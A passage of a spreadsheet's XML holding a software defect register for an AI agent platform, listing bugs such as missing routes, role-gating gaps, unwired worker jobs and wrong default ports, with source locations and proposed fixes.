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space\Development\hire-buddha-app\docs\current\defect-register\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="8_{DA7784BA-6DC5-42EC-A526-7D1C64311034}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15720" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Defect Register" sheetId="1" r:id="rId1"/>
  </sheets>
  <calcPr calcId="0"/>
  <fileRecoveryPr repairLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="7927" uniqueCount="2748">
  <si>
    <t>Consolidated defect register</t>
  </si>
  <si>
    <t>459 defects, 202 improvements, 22 source files. Shared guidance follows as Context records.</t>
  </si>
  <si>
    <t>One row per entry. Full source text continues across H–J. Blank severity or tier means it was not stated. Confidence labels are from the source, not a new code review.</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>Title / affected surface</t>
  </si>
  <si>
    <t>Record type</t>
  </si>
  <si>
    <t>Register / module</t>
  </si>
  <si>
    <t>Tier</t>
  </si>
  <si>
    <t>Severity</t>
  </si>
  <si>
    <t>Confidence (source)</t>
  </si>
  <si>
    <t>Full source details (1 of 3)</t>
  </si>
  <si>
    <t>Full source details (2 of 3)</t>
  </si>
  <si>
    <t>Full source details (3 of 3)</t>
  </si>
  <si>
    <t>Source</t>
  </si>
  <si>
    <t>Source Markdown file</t>
  </si>
  <si>
    <t>Source section</t>
  </si>
  <si>
    <t>Start line</t>
  </si>
  <si>
    <t>End line</t>
  </si>
  <si>
    <t>Source compiled</t>
  </si>
  <si>
    <t>PO-01</t>
  </si>
  <si>
    <t>Deleting a knowledge-base document always fails</t>
  </si>
  <si>
    <t>Defect</t>
  </si>
  <si>
    <t>01. Product &amp; Functional Overview</t>
  </si>
  <si>
    <t>T0</t>
  </si>
  <si>
    <t>High</t>
  </si>
  <si>
    <t>Verified</t>
  </si>
  <si>
    <t>### PO-01 — Deleting a knowledge-base document always fails
**✅ Verified · High**
The Knowledge Base page has a delete button. It calls
`DELETE /ai/documents/{id}`. That route does not exist. `ai/router.py` declares only
`POST /documents/upload`, `GET /documents` and `POST /documents/search`. The user
clicks delete, gets an error, and the document stays.
- [`frontend/src/pages/KnowledgeBase.tsx:106`](../../../frontend/src/pages/KnowledgeBase.tsx:106) — the call
- [`ai/router.py:606`](../../../backend/src/ai/router.py:606), [`:658`](../../../backend/src/ai/router.py:658), [`:667`](../../../backend/src/ai/router.py:667) — the only three document routes
**Fix:** add the delete route. It must also delete the `document_chunks` rows and
their embeddings, or the deleted document keeps coming back in search results.
---</t>
  </si>
  <si>
    <t>01-PRODUCT-OVERVIEW-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — User-visible things that do not work</t>
  </si>
  <si>
    <t>PO-02</t>
  </si>
  <si>
    <t>A tenant admin can open the AI config page but cannot save</t>
  </si>
  <si>
    <t>Medium</t>
  </si>
  <si>
    <t>### PO-02 — A tenant admin can open the AI config page but cannot save
**✅ Verified · Medium**
The React route for `/ai-config` allows `APP_ADMIN` **and** `TENANT_ADMIN`. Every
`/config/task-defaults` endpoint behind that page is guarded by `_require_app_admin`.
So a tenant admin browses to the page, fills the form, presses save, and gets
`403 Only App Administrators can configure AI task defaults`.
- [`frontend/src/router/index.tsx:321`](../../../frontend/src/router/index.tsx:321) — the route gate
- [`config/router.py`](../../../backend/src/config/router.py) — `_require_app_admin`
**Fix:** pick one. Either drop `TENANT_ADMIN` from the route gate, or let a tenant
admin set defaults for their own company. Do not leave a page that only fails on save.
---</t>
  </si>
  <si>
    <t>PO-03</t>
  </si>
  <si>
    <t>Nothing pushes a new user into onboarding</t>
  </si>
  <si>
    <t>### PO-03 — Nothing pushes a new user into onboarding
**✅ Verified · Medium**
The docstring on `onboarding_router.py` says the `ProtectedRoute` guard sends users
with `onboarding_status != "completed"` to `/onboarding`. It does not.
`ProtectedRoute` checks two things only: are you logged in, and is your role allowed.
`onboarding_status` is never read anywhere in the frontend outside a partner
dashboard pill.
A brand new tenant lands on an empty dashboard with no LLM key, no agent and no
phone number, and no prompt telling them what to do first.
- [`frontend/src/router/index.tsx:78`](../../../frontend/src/router/index.tsx:78) — `ProtectedRoute`
- [`auth/onboarding_router.py`](../../../backend/src/auth/onboarding_router.py) — the docstring that claims otherwise
**Fix:** add the redirect in `ProtectedRoute`, or delete the claim from the docstring
and accept that onboarding is optional. The first is better — the wizard is already
built and skippable.
---</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>PO-04</t>
  </si>
  <si>
    <t>Any logged-in user can read the internal cost report</t>
  </si>
  <si>
    <t>### PO-04 — Any logged-in user can read the internal cost report
**✅ Verified · High**
`GET /reports/costing` depends on `get_current_user` and `get_db` and nothing else.
There is no `RoleChecker`. It scopes rows to `current_user.company_id`, so it is not
a cross-tenant leak, but every `tenant_user` can read their company's **raw internal
cost** — what the platform pays providers. Compare that with the billed amount on the
same screen and the markup is obvious.
The React route has no `allowedRoles` at all. The only thing hiding the page is that
the sidebar link is shown to `app_admin` only — anyone who types the URL gets in.
- [`billing/billing_router.py:148`](../../../backend/src/billing/billing_router.py:148) — `get_costing_report`
- [`frontend/src/router/index.tsx:443`](../../../frontend/src/router/index.tsx:443) — `&lt;ProtectedRoute&gt;` with no roles
**Fix:** gate the route to `app_admin`. See also **BC-xx** in
[14 — Billing](14-BILLING-AND-CREDITS-DEFECTS.md).
---</t>
  </si>
  <si>
    <t>PO-05</t>
  </si>
  <si>
    <t>A reviewer approves without seeing what they are approving</t>
  </si>
  <si>
    <t>### PO-05 — A reviewer approves without seeing what they are approving
**✅ Verified · High**
Every HITL approval row stores a `context_snapshot` — what the agent was about to do.
`HITLPanel.tsx` never renders it. `grep context_snapshot` in that file returns
nothing. The reviewer sees the trigger string, a run-id prefix and a timestamp, and
two buttons: **Authorize** and **Block Cycle**.
An approval control that shows nothing about the action being approved is not a
safety control; it is a delay.
- [`frontend/src/pages/ai/HITLPanel.tsx`](../../../frontend/src/pages/ai/HITLPanel.tsx)
- [`ai/orm/execution.py:121`](../../../backend/src/ai/orm/execution.py:121) — where the snapshot is stored
**Fix:** render `context_snapshot` on the card, collapsed by default. It is already in
the row the endpoint returns.
---</t>
  </si>
  <si>
    <t>PO-06</t>
  </si>
  <si>
    <t>64 of the 98 tools are unfinished integrations</t>
  </si>
  <si>
    <t>T1</t>
  </si>
  <si>
    <t>### PO-06 — 64 of the 98 tools are unfinished integrations
**✅ Verified · High**
`tools/__init__.py` makes exactly 98 `ToolRegistry.register(...)` calls. 64 of those
are social-platform tools — 16 modules × 4 tools each. All of them inherit
`status = ToolStatus.EXPERIMENTAL`, and the tools README says plainly that they are
"not yet wired to any production entity and several are unfinished".
So "98 tools" is a true count of registered classes and a misleading count of working
capability. The number a customer should be told is closer to **34**.
Worse: the visibility gate that is supposed to hide `EXPERIMENTAL` tools is not wired
into execution at all — see
[`TOOL-LAYER-DEFECTS.md` TL-13](TOOL-LAYER-DEFECTS.md#tl-13--the-tool-status-gate-is-not-wired-into-execution).
So they are not just unfinished; they are runnable.
- [`ai/tools/__init__.py`](../../../backend/src/ai/tools/__init__.py) — 98 registrations
- [`ai/tools/social/base.py:48`](../../../backend/src/ai/tools/social/base.py:48) — the status line
- [`ai/tools/README.md`](../../../backend/src/ai/tools/README.md) — the honest note</t>
  </si>
  <si>
    <t>**Fix:** cut the social set down to the platforms that will actually be sold. See the
recommended reduction in [TOOL-LAYER-DEFECTS.md §7](TOOL-LAYER-DEFECTS.md#7-suggested-execution-order).
---</t>
  </si>
  <si>
    <t>3. T1 — Promises the product does not keep</t>
  </si>
  <si>
    <t>PO-07</t>
  </si>
  <si>
    <t>You can connect 9 social platforms but 16 have tools</t>
  </si>
  <si>
    <t>### PO-07 — You can connect 9 social platforms but 16 have tools
**✅ Verified · Medium**
`VALID_PLATFORMS` in `social_router.py` accepts nine platforms:
`linkedin, twitter, facebook, instagram, google_ads, youtube, tiktok, reddit, quora`.
The tools directory has sixteen. So an agent can be given `pinterest_*`,
`meta_ads_*`, `snapchat_ads_*`, `x_ads_*`, `linkedin_ads_*`, `linkedin_sales_nav_*`
and `youtube_ads_*` tools that can never find a stored connection, because the API
refuses to store one.
The failure surfaces as a runtime credential error inside the tool, not as a clear
"this platform is not supported" message at build time.
- [`ai/social_router.py:65`](../../../backend/src/ai/social_router.py:65) — `VALID_PLATFORMS`
- [`ai/tools/social/`](../../../backend/src/ai/tools/social/) — 16 modules
**Fix:** derive one list from the other. A platform is supported when it has both a
connection type and a tool module — everything else should not be registerable.
---</t>
  </si>
  <si>
    <t>PO-08</t>
  </si>
  <si>
    <t>DB_RECORDS is an advertised context source that does nothing</t>
  </si>
  <si>
    <t>Low</t>
  </si>
  <si>
    <t>### PO-08 — `DB_RECORDS` is an advertised context source that does nothing
**✅ Verified · Low**
`ContextSourceType.DB_RECORDS` exists in the backend enum and in the frontend types.
The builder shows the panel with a **Coming Soon** badge and disables it. Nothing
reads the value anywhere.
This is honest in the UI, so it is low severity — but the enum value is live in the
API, so an entity created through the API can carry a `DB_RECORDS` context source
that is silently ignored at run time.
- [`ai/schemas/enums.py:166`](../../../backend/src/ai/schemas/enums.py:166)
- [`frontend/src/types/index.ts:271`](../../../frontend/src/types/index.ts:271)
**Fix:** reject `DB_RECORDS` at the API boundary until it is implemented, so the
"Coming Soon" badge is true on both surfaces.
---</t>
  </si>
  <si>
    <t>PO-09</t>
  </si>
  <si>
    <t>A mistyped config key in the entity builder disappears silently</t>
  </si>
  <si>
    <t>Doc-reported</t>
  </si>
  <si>
    <t>### PO-09 — A mistyped config key in the entity builder disappears silently
**📄 Doc-reported · Medium**
Entity create is a closed Pydantic model. Unknown keys are dropped rather than
rejected. A seed author or an API user who writes `retry_policy` in the wrong JSON
column, or misspells a key, gets a `200 OK` and an entity that quietly ignores the
setting.
The seed authors hit this often enough to write it down as a known trap in
`SeedDocFactoryLite`.
- [`ai/schemas/`](../../../backend/src/ai/schemas/) — the entity create models
**Fix:** set the model to forbid extra fields and return a `422` naming the unknown
key. This is a small change with a large effect on how debuggable the builder is.
---</t>
  </si>
  <si>
    <t>PO-10</t>
  </si>
  <si>
    <t>A broken import turns a whole feature area into 404s</t>
  </si>
  <si>
    <t>### PO-10 — A broken import turns a whole feature area into 404s
**✅ Verified · Medium**
Most routers in `main.py` are mounted inside `try / except ImportError` with only a
`logger.warning` on failure. Billing, credits, cron, reports, email, social, tool
management, voice webhooks, phone numbers, sessions and messaging are all mounted
this way.
If one of those modules fails to import — a missing package, a typo — the app starts
normally and that entire feature area returns 404. Nothing in the UI says why.
- [`backend/src/main.py:120`](../../../backend/src/main.py:120) onwards — the mount blocks
**Fix:** keep the `try/except` if you want a partial boot, but record the failures and
expose them on the health endpoint, so "billing is 404" is one API call to diagnose
instead of a log hunt.
---</t>
  </si>
  <si>
    <t>PO-11</t>
  </si>
  <si>
    <t>Templates sit outside tenant scoping by design</t>
  </si>
  <si>
    <t>### PO-11 — Templates sit outside tenant scoping by design
**✅ Verified · Medium**
A template is an ordinary entity row with `is_template = true` and
`company_id = NULL`. `NULL` is what makes it visible to everyone.
That is the intended mechanism, but it means a template is not covered by any of the
`WHERE company_id = ...` filters that protect everything else. Any bug that lets a
non-`app_admin` set `is_template` on their own entity makes that entity global —
including its prompts and its plan.
- [`ai/service.py:32`](../../../backend/src/ai/service.py:32) —
  `effective_company_id = None if entity_data.get("is_template") else company_id`
**Fix:** check the caller's role at that line, not only on the template routes. The
create path is what actually decides the row's visibility.
---</t>
  </si>
  <si>
    <t>PO-12</t>
  </si>
  <si>
    <t>[voice/phone_pool_router.py](../../../backend/src/voice/phone_pool_router.py)</t>
  </si>
  <si>
    <t>T2</t>
  </si>
  <si>
    <t>| **PO-12** | [`voice/phone_pool_router.py`](../../../backend/src/voice/phone_pool_router.py) | 701 lines, not mounted anywhere. The only surviving reference is a sentence in the replacement's docstring. Also recorded as D-22 in the platform register | ✅ Verified |</t>
  </si>
  <si>
    <t>4. T2 — Dead code and dead surfaces</t>
  </si>
  <si>
    <t>PO-13</t>
  </si>
  <si>
    <t>[frontend/src/pages/assets/AssetLibrary.tsx](../../../frontend/src/pages/assets/AssetLibrary.tsx)</t>
  </si>
  <si>
    <t>| **PO-13** | [`frontend/src/pages/assets/AssetLibrary.tsx`](../../../frontend/src/pages/assets/AssetLibrary.tsx) | 314 lines, not routed, imported by nothing but its own CSS. Replaced by `Artifacts.tsx` | ✅ Verified |</t>
  </si>
  <si>
    <t>PO-14</t>
  </si>
  <si>
    <t>send_whatsapp_message() in [voice/whatsapp_handler.py:261](../../../backend/src/voice/whatsapp_handler.py:261)</t>
  </si>
  <si>
    <t>| **PO-14** | `send_whatsapp_message()` in [`voice/whatsapp_handler.py:261`](../../../backend/src/voice/whatsapp_handler.py:261) | Body is a `[MOCK]` log line with the real SDK call commented out. Nothing imports it, but it is easy to grab by mistake | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>PO-15</t>
  </si>
  <si>
    <t>The approval:{id} Redis publish at [ai/service.py:854](../../../backend/src/ai/service.py:854)</t>
  </si>
  <si>
    <t>| **PO-15** | The `approval:{id}` Redis publish at [`ai/service.py:854`](../../../backend/src/ai/service.py:854) | Nothing subscribes to it. The live channel is `hitl:{id}`, published by the router at [`ai/router.py:456`](../../../backend/src/ai/router.py:456) and consumed at [`governance_service.py:345`](../../../backend/src/ai/governance/governance_service.py:345) | ✅ Verified |</t>
  </si>
  <si>
    <t>PO-16</t>
  </si>
  <si>
    <t>The /api/v1/ai/phase11/ and /admin/phase11/ redirect shims</t>
  </si>
  <si>
    <t>| **PO-16** | The `/api/v1/ai/phase11/*` and `/admin/phase11/*` redirect shims | Both carry an explicit *"Remove after 2026-09-01"* comment. That date is today | ✅ Verified |</t>
  </si>
  <si>
    <t>PO-17</t>
  </si>
  <si>
    <t>The video_generation deprecated tool</t>
  </si>
  <si>
    <t>| **PO-17** | The `video_generation` deprecated tool | `ToolStatus.DEPRECATED`, still registered, still selectable because the visibility gate is unwired. Superseded by `video_generate` + `video_edit` | ✅ Verified |</t>
  </si>
  <si>
    <t>PO-18</t>
  </si>
  <si>
    <t>Two Redis channels look like the HITL channel</t>
  </si>
  <si>
    <t>T3</t>
  </si>
  <si>
    <t>### PO-18 — Two Redis channels look like the HITL channel
**✅ Verified · Low**
`hitl:{id}` is the real one. `approval:{id}` is published and never consumed. A
developer debugging a stuck approval will find the wrong channel first, because the
comment above the dead publish says *"The execution engine subscribes to
`approval:{approval_id}` before gating"* — which is not true.
Covered by the deletion in [PO-15](#4-t2--dead-code-and-dead-surfaces); listed here
because the misleading comment is the actual cost.
---</t>
  </si>
  <si>
    <t>5. T3 — Rough edges</t>
  </si>
  <si>
    <t>PO-19</t>
  </si>
  <si>
    <t>The SSE stream closes on a substring match</t>
  </si>
  <si>
    <t>### PO-19 — The SSE stream closes on a substring match
**📄 Doc-reported · Low**
The browser stops listening when it sees `COMPLETED`, `FAILED` or `CANCELLED` in the
raw JSON payload — a substring match, not a field read. Any event that happens to
carry one of those words inside a message, a tool result or a critic note will close
the stream early and the user will think the run stopped.
- [`frontend/src/hooks/useExecutionEvents.ts`](../../../frontend/src/hooks/useExecutionEvents.ts)
**Fix:** match on the parsed `status` field.
---</t>
  </si>
  <si>
    <t>PO-20</t>
  </si>
  <si>
    <t>A long HITL timeout ties up a worker</t>
  </si>
  <si>
    <t>### PO-20 — A long HITL timeout ties up a worker
**✅ Verified · Medium**
The governance service subscribes to `hitl:{approval_id}` and then blocks, polling
until `timeout_ms`. The default is 5 minutes, but the field is free — a tenant can set
an hour. That worker slot is unavailable for that whole hour.
With a small worker pool, a handful of pending approvals can stall every other run in
the company.
- [`ai/governance/governance_service.py:345`](../../../backend/src/ai/governance/governance_service.py:345)
**Fix:** stop blocking. Park the run in `PAUSED`, release the worker, and re-enqueue
it when the approval is answered. This is the single biggest throughput change
available in the kernel.
---</t>
  </si>
  <si>
    <t>PO-21</t>
  </si>
  <si>
    <t>"Agent" means four different things</t>
  </si>
  <si>
    <t>### PO-21 — "Agent" means four different things
**📄 Doc-reported · Low**
`AGENT` is one of four entity types, but the UI, the docs and the sidebar all use
"agent" loosely for any entity. New developers and new customers both misread
capacity limits and pricing because of it.
**Fix:** in user-facing copy, say "agent" only for the type. Everywhere else say
"entity" or the specific type.
---</t>
  </si>
  <si>
    <t>PO-22</t>
  </si>
  <si>
    <t>Costing and billing reports are the same query</t>
  </si>
  <si>
    <t>### PO-22 — Costing and billing reports are the same query
**✅ Verified · Low**
`GET /reports/billing` calls `svc.get_costing_report(...)` — the same method, the same
rows — and only builds a different `totals` dict. The comment says so:
*"For now billing and costing use the same data source"*.
That is fine today, but the two reports have different audiences and one of them
(costing) should not be visible to a tenant at all. Sharing the query makes it easy to
gate one and forget the other, which is exactly what happened in
[PO-04](#po-04--any-logged-in-user-can-read-the-internal-cost-report).
- [`billing/billing_router.py:188`](../../../backend/src/billing/billing_router.py:188)
---</t>
  </si>
  <si>
    <t>SA-01</t>
  </si>
  <si>
    <t>STREAMING_HOST defaults to a service that does not run</t>
  </si>
  <si>
    <t>02. System Architecture &amp; Topology</t>
  </si>
  <si>
    <t>Critical</t>
  </si>
  <si>
    <t>### SA-01 — `STREAMING_HOST` defaults to a service that does not run
**✅ Verified · Critical**
`common/config.py` sets `STREAMING_HOST = "localhost:8002"` and
`STREAMING_PROTOCOL = "ws"`. Port 8002 is the retired voice service. No script starts
it — it is not in `start_services.sh`, `stop_services.sh`, or `docker-compose.yml`.
The webhook router builds the `wss://` URL it hands to Twilio from these two settings.
If `backend/.env` does not override them, every inbound call returns TwiML pointing
telephony at a dead port, and the call fails at the WebSocket handshake.
- [`common/config.py:10`](../../../backend/src/common/config.py:10) — the two defaults
- [`voice/webhook_router.py`](../../../backend/src/voice/webhook_router.py) — where the URL is built
**Fix:** change the defaults to the gateway host and `wss`. The gateway already serves
`/stream/twilio/{id}` and `/stream/tata/{id}` natively.
---</t>
  </si>
  <si>
    <t>02-SYSTEM-ARCHITECTURE-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — Wrong by default</t>
  </si>
  <si>
    <t>SA-02</t>
  </si>
  <si>
    <t>Apache still proxies streaming.hirebuddha.com to the dead port</t>
  </si>
  <si>
    <t>### SA-02 — Apache still proxies `streaming.hirebuddha.com` to the dead port
**✅ Verified · High**
`streaming.hirebuddha.com-le-ssl.conf` still has
`ProxyPass / http://localhost:8002/` and two `RewriteRule`s pointing WebSocket
upgrades at `ws://127.0.0.1:8002/`. Nothing listens there.
This is the other half of [SA-01](#sa-01--streaming_host-defaults-to-a-service-that-does-not-run):
even with the setting fixed, any client that has cached the old host keeps hitting a
dead vhost, and the failure looks like a network problem rather than a config one.
- [`deploy/apache/streaming.hirebuddha.com-le-ssl.conf:12`](../../../deploy/apache/streaming.hirebuddha.com-le-ssl.conf:12), [`:19`](../../../deploy/apache/streaming.hirebuddha.com-le-ssl.conf:19)
**Fix:** repoint both vhosts at 8001, or delete them. This is step 3 of **W-1** in the
platform register.
---</t>
  </si>
  <si>
    <t>SA-03</t>
  </si>
  <si>
    <t>The gateway's default database port is wrong</t>
  </si>
  <si>
    <t>### SA-03 — The gateway's default database port is wrong
**✅ Verified · High**
`UnifiedGatewaySettings.DATABASE_URL` defaults to
`postgresql+asyncpg://postgres:postgres@localhost:5432/hirebuddha`. Docker maps
Postgres to host port **5433**, not 5432. Every other config in the tree uses 5433.
The gateway needs the database for the dispatcher and `SessionManager`. With the
default in play it cannot connect at all.
- [`gateway/gateway_config.py:28`](../../../backend/src/gateway/gateway_config.py:28)
**Fix:** change the default to 5433 so it matches the compose file it ships with.
---</t>
  </si>
  <si>
    <t>SA-04</t>
  </si>
  <si>
    <t>Five enqueue calls ignore REDIS_URL and hardcode localhost</t>
  </si>
  <si>
    <t>### SA-04 — Five enqueue calls ignore `REDIS_URL` and hardcode localhost
**✅ Verified · High**
`ai/service.py` enqueues jobs with `create_pool(RedisSettings())` — no arguments — at
five separate places. `RedisSettings()` with no arguments means arq's defaults:
`localhost:6379`. `settings.REDIS_URL` is never consulted on any of these paths.
It works today because Redis is on localhost. The day Redis moves to a managed
instance or another host, executions stop being enqueued and no error points at the
cause.
- [`ai/service.py:316`](../../../backend/src/ai/service.py:316), [`:611`](../../../backend/src/ai/service.py:611), [`:747`](../../../backend/src/ai/service.py:747), [`:852`](../../../backend/src/ai/service.py:852), [`:926`](../../../backend/src/ai/service.py:926)
**Fix:** one shared helper that builds `RedisSettings` from `settings.REDIS_URL`, used
everywhere. The worker already has `_parse_redis_url` — extract and reuse it.
---</t>
  </si>
  <si>
    <t>SA-05</t>
  </si>
  <si>
    <t>The worker's Redis parser throws away password, TLS and database index</t>
  </si>
  <si>
    <t>### SA-05 — The worker's Redis parser throws away password, TLS and database index
**✅ Verified · High**
`WorkerSettings._parse_redis_url` returns only `parsed.hostname` and `parsed.port`.
A `REDIS_URL` of `rediss://:secret@redis.internal:6380/2` becomes
`RedisSettings(host="redis.internal", port=6380)` — no password, no TLS, database 0.
The connection then either fails with an auth error, or worse, succeeds against the
wrong database.
- [`ai/worker.py`](../../../backend/src/ai/worker.py) — `_parse_redis_url`
**Fix:** use `RedisSettings.from_dsn(settings.REDIS_URL)`, which arq provides for
exactly this.
---</t>
  </si>
  <si>
    <t>SA-06</t>
  </si>
  <si>
    <t>The 6-hourly dreaming cron enqueues a job the worker cannot run</t>
  </si>
  <si>
    <t>### SA-06 — The 6-hourly dreaming cron enqueues a job the worker cannot run
**✅ Verified · High**
`worker.py` imports `dreaming_worker` and `graph_maintenance_worker` from `arq_jobs`,
but **neither appears in `WorkerSettings.functions`**. `dreaming_cron_trigger` — which
*is* registered as a cron and runs at 00:15, 06:15, 12:15 and 18:15 — enqueues by
string name:
```python
await arq.enqueue_job("dreaming_worker", entity_id, company_id, False)
```
The worker rejects every one of those as an unknown function. So scheduled memory
consolidation has never run. Only the outcome-triggered path
(`dreaming_outcome_trigger`, which *is* registered) works.
`graph_maintenance_worker` — edge-weight decay and pruning of the semantic graph — has
no caller at all, so the graph is never maintained.
- [`ai/worker.py`](../../../backend/src/ai/worker.py) — the `functions` list and the imports above it</t>
  </si>
  <si>
    <t>- [`ai/core/arq_jobs.py`](../../../backend/src/ai/core/arq_jobs.py) — `dreaming_worker`, `graph_maintenance_worker`
**Fix:** add both to `functions`, and add a cron for graph maintenance. Then check
whether four dreaming runs a day is actually what you want before switching it on.
---</t>
  </si>
  <si>
    <t>3. T1 — Silently does nothing</t>
  </si>
  <si>
    <t>SA-07</t>
  </si>
  <si>
    <t>The child-run queue is declared and not used</t>
  </si>
  <si>
    <t>### SA-07 — The child-run queue is declared and not used
**✅ Verified · Medium**
`CHILD_RUN_QUEUE = "children"` is declared with a long comment explaining that it
exists so a fan-out `PROCESS` cannot starve top-level runs. The comment then says
plainly: **"NOT routed yet"**.
Child runs still go on the default queue. The only thing bounding fan-out is
`governance.max_concurrent_children`, which is itself advisory — see **D-13** in the
platform register. So there are two separate controls against runaway fan-out and
neither one is active.
- [`ai/worker.py`](../../../backend/src/ai/worker.py) — `CHILD_RUN_QUEUE`
---</t>
  </si>
  <si>
    <t>SA-08</t>
  </si>
  <si>
    <t>The lead queue fills up and is never drained</t>
  </si>
  <si>
    <t>### SA-08 — The lead queue fills up and is never drained
**✅ Verified · Medium**
`ai/lead_queue_worker.py` defines a 5-second polling loop and an arq wrapper. Neither
appears in `WorkerSettings.functions`, no script starts it, and no startup hook awaits
it. Grepping `backend/src` finds zero importers.
The gateway dispatcher writes leads into `lead_queue` on the `lead.created` path.
Those rows accumulate and are never dialled.
- [`ai/lead_queue_worker.py`](../../../backend/src/ai/lead_queue_worker.py)
- [`gateway/dispatcher.py:282`](../../../backend/src/gateway/dispatcher.py:282) — the producer
Also recorded as D-21 / D-26 in the platform register. **Decide: wire it up or delete
it.** Leaving it is the only wrong answer.
---</t>
  </si>
  <si>
    <t>SA-09</t>
  </si>
  <si>
    <t>The event bus loses everything on a gateway restart</t>
  </si>
  <si>
    <t>### SA-09 — The event bus loses everything on a gateway restart
**✅ Verified · Medium**
`InMemoryEventBus` is an `asyncio.Queue` fan-out inside the gateway process. It does
not persist and does not span processes. Any envelope published but not yet dispatched
when the gateway restarts is gone, with no record that it existed.
Events published when no consumer is registered are counted as **dropped**, not
queued.
`EVENT_BUS_TYPE` defaults to `memory` and `memory` is the only implemented backend —
`kafka` is aspirational.
- [`gateway/event_bus.py`](../../../backend/src/gateway/event_bus.py)
**Fix:** for a webhook that has already been acknowledged to a provider, in-memory is
the wrong durability. Write the envelope to Postgres or push straight to Redis before
returning 200.
---</t>
  </si>
  <si>
    <t>SA-10</t>
  </si>
  <si>
    <t>Neither the gateway nor the worker reports traces</t>
  </si>
  <si>
    <t>### SA-10 — Neither the gateway nor the worker reports traces
**✅ Verified · Medium**
`setup_telemetry` is called on the last line of `main.py` — the Backend API only. The
gateway has no OpenTelemetry instrumentation at all (it has a hand-rolled
`/metrics/gateway` JSON endpoint instead), and the worker has none either.
The worker is where every agent execution actually happens. So the process that does
the expensive work is the one with no distributed tracing.
- [`common/telemetry.py`](../../../backend/src/common/telemetry.py) — 32 lines, one caller
- [`backend/src/main.py`](../../../backend/src/main.py) — the only `setup_telemetry` call
---</t>
  </si>
  <si>
    <t>SA-11</t>
  </si>
  <si>
    <t>[gateway/main.py](../../../backend/src/gateway/main.py) + [gateway/config.py](../../../backend/src/gateway/config.py)</t>
  </si>
  <si>
    <t>| **SA-11** | [`gateway/main.py`](../../../backend/src/gateway/main.py) + [`gateway/config.py`](../../../backend/src/gateway/config.py) | 73 lines of superseded pure-proxy gateway plus its 10-line settings class. Nothing starts either. `config.py` is imported only by `main.py` | ✅ Verified |</t>
  </si>
  <si>
    <t>4. T2 — Delete</t>
  </si>
  <si>
    <t>SA-12</t>
  </si>
  <si>
    <t>[voice/main.py](../../../backend/src/voice/main.py)</t>
  </si>
  <si>
    <t>| **SA-12** | [`voice/main.py`](../../../backend/src/voice/main.py) | The retired port-8002 app. Blocked only on **W-1** in the platform register. The two routers it mounts (`webhook_router`, `messaging_router`) are already mounted by the backend | ✅ Verified |</t>
  </si>
  <si>
    <t>SA-13</t>
  </si>
  <si>
    <t>Both streaming.hirebuddha.com vhosts</t>
  </si>
  <si>
    <t>| **SA-13** | Both `streaming.hirebuddha.com` vhosts | See [SA-02](#sa-02--apache-still-proxies-streaminghirebuddhacom-to-the-dead-port) | ✅ Verified |</t>
  </si>
  <si>
    <t>SA-14</t>
  </si>
  <si>
    <t>The duplicate :80 vhost for app.hirebuddha.com</t>
  </si>
  <si>
    <t>| **SA-14** | The duplicate `*:80` vhost for `app.hirebuddha.com` | `app.hirebuddha.com.conf` declares a port-80 vhost, and `app.hirebuddha.com-le-ssl.conf` declares a **second** one at line 20 with the HTTPS redirect commented out. Whichever Apache loads first wins, and it is not obvious which | ✅ Verified |</t>
  </si>
  <si>
    <t>SA-15</t>
  </si>
  <si>
    <t>The stale worker.py docstring</t>
  </si>
  <si>
    <t>| **SA-15** | The stale `worker.py` docstring | It says execution logic lives in `ai.core.execution_engine`. That module does not exist — `core/` has no `execution_engine.py`. The docstring sends every new reader to a file that was deleted | ✅ Verified |</t>
  </si>
  <si>
    <t>SA-16</t>
  </si>
  <si>
    <t>Route order in the gateway is load-bearing and unguarded</t>
  </si>
  <si>
    <t>### SA-16 — Route order in the gateway is load-bearing and unguarded
**✅ Verified · Medium**
`gateway/app.py` ends with a catch-all `@app.api_route("/{path:path}")`. FastAPI
matches in declaration order, so **any endpoint added below that line is unreachable**
— it is silently swallowed by the reverse proxy and forwarded to port 8000, where it
404s.
Nothing enforces the ordering. It is a comment and a convention.
- [`gateway/app.py`](../../../backend/src/gateway/app.py) — the catch-all, declared last
**Fix:** move the catch-all into a small `register_proxy(app)` function called at the
very end of the module, so adding a route in the wrong place is impossible rather than
merely discouraged.
---</t>
  </si>
  <si>
    <t>5. T3 — Fragile</t>
  </si>
  <si>
    <t>SA-17</t>
  </si>
  <si>
    <t>SSE only works if the path ends in /stream</t>
  </si>
  <si>
    <t>### SA-17 — SSE only works if the path ends in `/stream`
**✅ Verified · Medium**
The gateway decides whether to use the no-read-timeout relay path with:
```python
wants_sse = path.endswith("/stream") or "text/event-stream" in headers.get("accept", "")
```
Any streaming endpoint whose path does not end in `/stream`, from a client that does
not set the `Accept` header, gets the buffered proxy path: it blocks until the 60-second
read timeout and hands the client a 503.
- [`gateway/app.py`](../../../backend/src/gateway/app.py) — the `wants_sse` check
---</t>
  </si>
  <si>
    <t>SA-18</t>
  </si>
  <si>
    <t>Suspension middleware costs a database round trip on every request</t>
  </si>
  <si>
    <t>### SA-18 — Suspension middleware costs a database round trip on every request
**✅ Verified · Medium**
`CompanySuspensionMiddleware` decodes the bearer token itself, opens **its own**
`AsyncSessionLocal`, and looks up the company — on every authenticated request, before
the route runs. Its own docstring admits it should probably be a dependency.
At current traffic this is invisible. It is a fixed tax on every request and the first
thing to look at when p50 latency matters.
- [`common/middleware.py`](../../../backend/src/common/middleware.py)
**Fix:** make it a dependency, and cache the suspension flag in Redis with a short TTL.
A suspended company does not need to be detected within one request.
---</t>
  </si>
  <si>
    <t>SA-19</t>
  </si>
  <si>
    <t>Two CORS lists that must be kept in sync by hand</t>
  </si>
  <si>
    <t>### SA-19 — Two CORS lists that must be kept in sync by hand
